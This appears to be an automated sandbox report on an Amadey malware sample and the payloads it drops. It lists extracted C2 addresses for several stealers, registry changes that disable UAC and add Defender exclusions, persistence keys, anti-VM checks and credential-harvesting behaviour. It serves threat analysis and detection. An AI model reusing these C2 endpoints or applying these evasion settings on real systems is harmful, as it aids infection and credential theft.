amadey | cbbf0f3ef60d36f4dacec456669bf6b5264a56ec4a88a7ca251fe0163c066c5b

Analysis

max time kernel
221s
max time network
298s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
07-05-2024 23:58

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

cbbf0f3ef60d36f4dacec456669bf6b5264a56ec4a88a7ca251fe0163c066c5b.exe
Size

1.7MB
MD5

f64d559e0b56442b38d49463f4b94fb1
SHA1

cf66d63b94b628e87967500b4b542214ba8b0bfb
SHA256

cbbf0f3ef60d36f4dacec456669bf6b5264a56ec4a88a7ca251fe0163c066c5b
SHA512

9e7c2ca18abe33cc49a8a9b9cfa0fe7e168662445d890ccce5d61a7d367739679a4683d3f3a519db46669823b03b025f475d3c5ae5ab4f14f4d33a9523a4784e
SSDEEP

24576:zy6Vm95lzxp6iP4uW8OA/D3xBS/SfvaZAn9AUWaxlivZ8H6Azg1WwUHEl6OLGJ7J:2kmRznily7nSIBnSzuPar3RMlgQxea

Malware Config

Extracted

Family

amadey

Version

4.20

http://193.233.132.139

Attributes

install_dir
5454e6f062
install_file
explorta.exe
strings_key
c7a869c5ba1d72480093ec207994e2bf
url_paths
/sev56rkm/index.php

rc4.plain

Extracted

Family

amadey

Version

4.18

http://193.233.132.56

Attributes

install_dir
09fd851a4f
install_file
explorha.exe
strings_key
443351145ece4966ded809641c77cfa8
url_paths
/Pneh2sXQk0/index.php

rc4.plain

Extracted

Family

redline

Botnet

Test1234

185.215.113.67:26260

Extracted

Family

risepro

147.45.47.126:58709

Extracted

Family

stealc

http://49.13.229.86

Attributes

url_path
/c73eed764cc59dcb.php

Extracted

Family

redline

Botnet

@CLOUDYTTEAM

185.172.128.33:8970

Extracted

Family

redline

Botnet

newpub

185.215.113.67:26260

Extracted

Family

lumma

https://affordcharmcropwo.shop/api

https://dismissalcylinderhostw.shop/api

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey

Detect ZGRat V1 6 IoCs

resource	yara_rule
behavioral2/memory/5672-535-0x0000000000400000-0x0000000000592000-memory.dmp	family_zgrat_v1
behavioral2/files/0x000900000001ac81-544.dat	family_zgrat_v1
behavioral2/memory/5304-564-0x0000000000ED0000-0x0000000000F90000-memory.dmp	family_zgrat_v1
behavioral2/memory/6624-788-0x000001E802160000-0x000001E805994000-memory.dmp	family_zgrat_v1
behavioral2/memory/6624-790-0x000001E820160000-0x000001E82026A000-memory.dmp	family_zgrat_v1
behavioral2/memory/6624-794-0x000001E820030000-0x000001E820054000-memory.dmp	family_zgrat_v1

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba
Lumma Stealer
An infostealer written in C++ first seen in August 2022.
stealer lumma

Modifies firewall policy service 2 TTPs 1 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1"	5Gh6FarKzvCmEvFvlH608SC5.exe

PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
loader privateloader
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 7 IoCs

resource	yara_rule
behavioral2/files/0x000800000001ac25-75.dat	family_redline
behavioral2/memory/2488-83-0x0000000000880000-0x00000000008D2000-memory.dmp	family_redline
behavioral2/files/0x000a00000001ac80-543.dat	family_redline
behavioral2/files/0x000900000001ac81-544.dat	family_redline
behavioral2/memory/1344-545-0x0000000000ED0000-0x0000000000F22000-memory.dmp	family_redline
behavioral2/memory/5304-564-0x0000000000ED0000-0x0000000000F90000-memory.dmp	family_redline
behavioral2/memory/6660-1098-0x0000000000A00000-0x0000000000A52000-memory.dmp	family_redline

RisePro
RisePro stealer is an infostealer distributed by PrivateLoader.
stealer risepro
Stealc
Stealc is an infostealer written in C++.
stealer stealc

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	file300un.exe

Windows security bypass 2 TTPs 9 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"	AEY6uLsOwAVuhQ9weg2lKxi4.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"	AEY6uLsOwAVuhQ9weg2lKxi4.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"	AEY6uLsOwAVuhQ9weg2lKxi4.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"	AEY6uLsOwAVuhQ9weg2lKxi4.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\AEY6uLsOwAVuhQ9weg2lKxi4.exe = "0"	AEY6uLsOwAVuhQ9weg2lKxi4.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\Jw2APj9A3AIg1Sx09xCCBO2x.exe = "0"	Jw2APj9A3AIg1Sx09xCCBO2x.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\zFin8p9T2XaFxNzDfLsRDA3Q.exe = "0"	zFin8p9T2XaFxNzDfLsRDA3Q.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0"	AEY6uLsOwAVuhQ9weg2lKxi4.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0"	AEY6uLsOwAVuhQ9weg2lKxi4.exe

XMRig Miner payload 2 IoCs

miner

resource	yara_rule
behavioral2/files/0x000700000001ac9b-828.dat	family_xmrig
behavioral2/files/0x000700000001ac9b-828.dat	xmrig

ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 14 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	amert.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorha.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorha.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorta.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorta.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	cbbf0f3ef60d36f4dacec456669bf6b5264a56ec4a88a7ca251fe0163c066c5b.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorha.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorha.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorha.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	2702c48058.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	5Gh6FarKzvCmEvFvlH608SC5.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorta.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorta.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorta.exe

Blocklisted process makes network request 7 IoCs

flow	pid	Process
171	5264	rundll32.exe
237	6032	u4ck.1.exe
52	5992	rundll32.exe
266	6032	u4ck.1.exe
52	5992	rundll32.exe
219	6436	rundll32.exe
52	5992	rundll32.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 36 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
6292	powershell.exe
5756	powershell.exe
6604	powershell.exe
2812	powershell.exe
7036	powershell.exe
4184	powershell.exe
6796	powershell.exe
5288	powershell.exe
5404	powershell.EXE
3596	powershell.exe
356	powershell.exe
6024	powershell.exe
5864	powershell.exe
968	powershell.exe
4688	powershell.exe
5436	powershell.exe
652	powershell.exe
3912	powershell.exe
2668	powershell.exe
5020	powershell.exe
5280	powershell.exe
5820	powershell.exe
7136	powershell.exe
4736	powershell.exe
6960	powershell.exe
6128	powershell.exe
6584	powershell.exe
5480	powershell.exe
5640	powershell.exe
1348	powershell.exe
4460	powershell.exe
500	powershell.exe
5548	powershell.exe
2544	powershell.exe
2736	powershell.exe
2876	powershell.exe

Downloads MZ/PE file

Modifies Windows Firewall 2 TTPs 5 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
2736	netsh.exe
6340	netsh.exe
3240	netsh.exe
5056	netsh.exe
2652	netsh.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks BIOS information in registry 2 TTPs 31 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	cbbf0f3ef60d36f4dacec456669bf6b5264a56ec4a88a7ca251fe0163c066c5b.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	5Gh6FarKzvCmEvFvlH608SC5.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	5Gh6FarKzvCmEvFvlH608SC5.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorha.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorta.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorha.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorha.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorha.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorha.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorha.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	2702c48058.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorta.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorha.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	2702c48058.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorha.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorta.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorha.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorta.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	amert.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorta.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorta.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorta.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	amert.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorta.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorha.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorta.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorta.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	cbbf0f3ef60d36f4dacec456669bf6b5264a56ec4a88a7ca251fe0163c066c5b.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Control Panel\International\Geo\Nation	Oyazleo.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Control Panel\International\Geo\Nation	JkNVuim.exe

Drops startup file 9 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ogmQYPFMgeYIN6LRbIocQaPE.bat	installutil.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VxddXNC54FB7DNGlT4PTMKd3.bat	installutil.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\gnfucBEnCLgl73AQQQblKtGP.bat	installutil.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LpACxQRmEm10qp77cOEy6tSd.bat	installutil.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\so6pzzG4nklkw0Drnkhy1eDg.bat	installutil.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1NAaxoj22O1BppXlw42MKPfJ.bat	installutil.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OxztbaN2WgPrHbWppXKVxgXU.bat	installutil.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d7VAn5WIRcYV9PSQNnTHwR1Q.bat	installutil.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ELxAcMzyMRWVxG3waPvOjhYH.bat	installutil.exe

Executes dropped EXE 64 IoCs

pid	Process
1900	explorta.exe
4744	amert.exe
5088	explorha.exe
2836	swiiiii.exe
2488	jok.exe
2788	2702c48058.exe
2428	swiy.exe
4912	file300un.exe
4104	explorta.exe
708	explorha.exe
4136	9b90a2ae82.exe
5396	gold.exe
5636	vnk9tUEAJePB8ba50JljxnWI.exe
4988	u4ck.0.exe
5800	AEY6uLsOwAVuhQ9weg2lKxi4.exe
5924	Jw2APj9A3AIg1Sx09xCCBO2x.exe
5844	zFin8p9T2XaFxNzDfLsRDA3Q.exe
6072	PdLV4NcQzwxOS6sHtzFXCla9.exe
5460	5Gh6FarKzvCmEvFvlH608SC5.exe
5684	alexxxxxxxx.exe
1344	keks.exe
5304	trf.exe
6032	u4ck.1.exe
5172	install.exe
3728	GameService.exe
4224	jTVmg0EqDO0h2QAR8MR1Qr6z.exe
5456	Install.exe
5040	NewB.exe
5596	GameService.exe
6188	ISetup8.exe
6252	GameService.exe
6300	GameService.exe
6316	GameService.exe
6392	GameSyncLink.exe
6624	GameService.exe
6696	toolspub1.exe
6748	GameService.exe
6772	GameService.exe
6800	GameService.exe
6816	GameService.exe
6904	PiercingNetLink.exe
6924	GameSyncLink.exe
7008	GameService.exe
7028	GameService.exe
7044	GameService.exe
7060	GameService.exe
7108	GameSyncLinks.exe
6364	PiercingNetLink.exe
6628	GameSyncLinks.exe
6724	GameSyncLink.exe
6772	4767d2e713f2021e8fe856e3ea638b58.exe
6912	PiercingNetLink.exe
2136	GameSyncLinks.exe
4052	GETF3fA7tgYghzB6TkHXZYFG.exe
5468	Install.exe
1432	GameSyncLink.exe
6388	PiercingNetLink.exe
6124	GameSyncLinks.exe
6936	GameSyncLink.exe
6884	PiercingNetLink.exe
5484	explorta.exe
4432	explorha.exe
5940	Install.exe
4208	Install.exe

Identifies Wine through registry keys 2 TTPs 6 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Wine	explorha.exe
Key opened	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Wine	explorha.exe
Key opened	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Wine	explorha.exe
Key opened	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Wine	explorha.exe
Key opened	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Wine	amert.exe
Key opened	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Wine	explorha.exe

Loads dropped DLL 8 IoCs

pid	Process
5252	rundll32.exe
5264	rundll32.exe
1096	RegAsm.exe
1096	RegAsm.exe
5992	rundll32.exe
6436	rundll32.exe
4988	u4ck.0.exe
4988	u4ck.0.exe

Reads WinSCP keys stored on the system 2 TTPs
Tries to access WinSCP stored sessions.
spyware stealer

Data from Local System
T1005

Credentials in Registry
T1552.002
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Themida packer 46 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral2/memory/1104-0-0x0000000000DC0000-0x0000000001309000-memory.dmp	themida
behavioral2/memory/1104-1-0x0000000000DC0000-0x0000000001309000-memory.dmp	themida
behavioral2/memory/1104-2-0x0000000000DC0000-0x0000000001309000-memory.dmp	themida
behavioral2/memory/1104-3-0x0000000000DC0000-0x0000000001309000-memory.dmp	themida
behavioral2/memory/1104-6-0x0000000000DC0000-0x0000000001309000-memory.dmp	themida
behavioral2/memory/1104-4-0x0000000000DC0000-0x0000000001309000-memory.dmp	themida
behavioral2/memory/1104-5-0x0000000000DC0000-0x0000000001309000-memory.dmp	themida
behavioral2/memory/1104-7-0x0000000000DC0000-0x0000000001309000-memory.dmp	themida
behavioral2/files/0x000700000001ac51-14.dat	themida
behavioral2/memory/1900-19-0x0000000000B80000-0x00000000010C9000-memory.dmp	themida
behavioral2/memory/1900-21-0x0000000000B80000-0x00000000010C9000-memory.dmp	themida
behavioral2/memory/1900-17-0x0000000000B80000-0x00000000010C9000-memory.dmp	themida
behavioral2/memory/1900-22-0x0000000000B80000-0x00000000010C9000-memory.dmp	themida
behavioral2/memory/1900-25-0x0000000000B80000-0x00000000010C9000-memory.dmp	themida
behavioral2/memory/1900-24-0x0000000000B80000-0x00000000010C9000-memory.dmp	themida
behavioral2/memory/1900-23-0x0000000000B80000-0x00000000010C9000-memory.dmp	themida
behavioral2/memory/1900-20-0x0000000000B80000-0x00000000010C9000-memory.dmp	themida
behavioral2/memory/1104-16-0x0000000000DC0000-0x0000000001309000-memory.dmp	themida
behavioral2/memory/1900-40-0x0000000000B80000-0x00000000010C9000-memory.dmp	themida
behavioral2/files/0x000800000001abe9-115.dat	themida
behavioral2/files/0x000800000001abe9-129.dat	themida
behavioral2/memory/2788-140-0x0000000000950000-0x0000000000FDA000-memory.dmp	themida
behavioral2/memory/2788-149-0x0000000000950000-0x0000000000FDA000-memory.dmp	themida
behavioral2/memory/2788-148-0x0000000000950000-0x0000000000FDA000-memory.dmp	themida
behavioral2/memory/2788-145-0x0000000000950000-0x0000000000FDA000-memory.dmp	themida
behavioral2/memory/2788-146-0x0000000000950000-0x0000000000FDA000-memory.dmp	themida
behavioral2/memory/2788-137-0x0000000000950000-0x0000000000FDA000-memory.dmp	themida
behavioral2/memory/2788-136-0x0000000000950000-0x0000000000FDA000-memory.dmp	themida
behavioral2/memory/2788-139-0x0000000000950000-0x0000000000FDA000-memory.dmp	themida
behavioral2/memory/2788-132-0x0000000000950000-0x0000000000FDA000-memory.dmp	themida
behavioral2/memory/4104-244-0x0000000000B80000-0x00000000010C9000-memory.dmp	themida
behavioral2/memory/4104-245-0x0000000000B80000-0x00000000010C9000-memory.dmp	themida
behavioral2/memory/4104-243-0x0000000000B80000-0x00000000010C9000-memory.dmp	themida
behavioral2/memory/4104-242-0x0000000000B80000-0x00000000010C9000-memory.dmp	themida
behavioral2/memory/4104-241-0x0000000000B80000-0x00000000010C9000-memory.dmp	themida
behavioral2/memory/1900-240-0x0000000000B80000-0x00000000010C9000-memory.dmp	themida
behavioral2/memory/4104-238-0x0000000000B80000-0x00000000010C9000-memory.dmp	themida
behavioral2/memory/4104-239-0x0000000000B80000-0x00000000010C9000-memory.dmp	themida
behavioral2/memory/4104-248-0x0000000000B80000-0x00000000010C9000-memory.dmp	themida
behavioral2/memory/2788-310-0x0000000000950000-0x0000000000FDA000-memory.dmp	themida
behavioral2/memory/1900-332-0x0000000000B80000-0x00000000010C9000-memory.dmp	themida
behavioral2/files/0x000700000001ac79-488.dat	themida
behavioral2/memory/5460-491-0x0000000140000000-0x0000000140917000-memory.dmp	themida
behavioral2/memory/5460-835-0x0000000140000000-0x0000000140917000-memory.dmp	themida
behavioral2/memory/5484-902-0x0000000000B80000-0x00000000010C9000-memory.dmp	themida
behavioral2/memory/5484-918-0x0000000000B80000-0x00000000010C9000-memory.dmp	themida

Windows security modification 2 TTPs 9 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\zFin8p9T2XaFxNzDfLsRDA3Q.exe = "0"	zFin8p9T2XaFxNzDfLsRDA3Q.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0"	AEY6uLsOwAVuhQ9weg2lKxi4.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\AEY6uLsOwAVuhQ9weg2lKxi4.exe = "0"	AEY6uLsOwAVuhQ9weg2lKxi4.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"	AEY6uLsOwAVuhQ9weg2lKxi4.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"	AEY6uLsOwAVuhQ9weg2lKxi4.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0"	AEY6uLsOwAVuhQ9weg2lKxi4.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\Jw2APj9A3AIg1Sx09xCCBO2x.exe = "0"	Jw2APj9A3AIg1Sx09xCCBO2x.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"	AEY6uLsOwAVuhQ9weg2lKxi4.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"	AEY6uLsOwAVuhQ9weg2lKxi4.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 5 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Windows\CurrentVersion\Run\2702c48058.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000020001\\2702c48058.exe"	explorta.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Windows\CurrentVersion\Run\9b90a2ae82.exe = "C:\\Users\\Admin\\1000021002\\9b90a2ae82.exe"	explorta.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	AEY6uLsOwAVuhQ9weg2lKxi4.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	Jw2APj9A3AIg1Sx09xCCBO2x.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	zFin8p9T2XaFxNzDfLsRDA3Q.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 10 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	file300un.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	explorta.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	explorta.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	cbbf0f3ef60d36f4dacec456669bf6b5264a56ec4a88a7ca251fe0163c066c5b.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	2702c48058.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	file300un.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	5Gh6FarKzvCmEvFvlH608SC5.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	explorta.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	explorta.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	explorta.exe

Drops Chrome extension 4 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json	Oyazleo.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json	JkNVuim.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json	Oyazleo.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json	JkNVuim.exe

Drops desktop.ini file(s) 1 IoCs

description	ioc	Process
File opened for modification	C:\$RECYCLE.BIN\S-1-5-18\desktop.ini	Install.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
176	bitbucket.org
175	bitbucket.org

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral2/files/0x000800000001ac31-263.dat	autoit_exe

Drops file in System32 directory 62 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache	Oyazleo.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content	Oyazleo.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	Install.exe
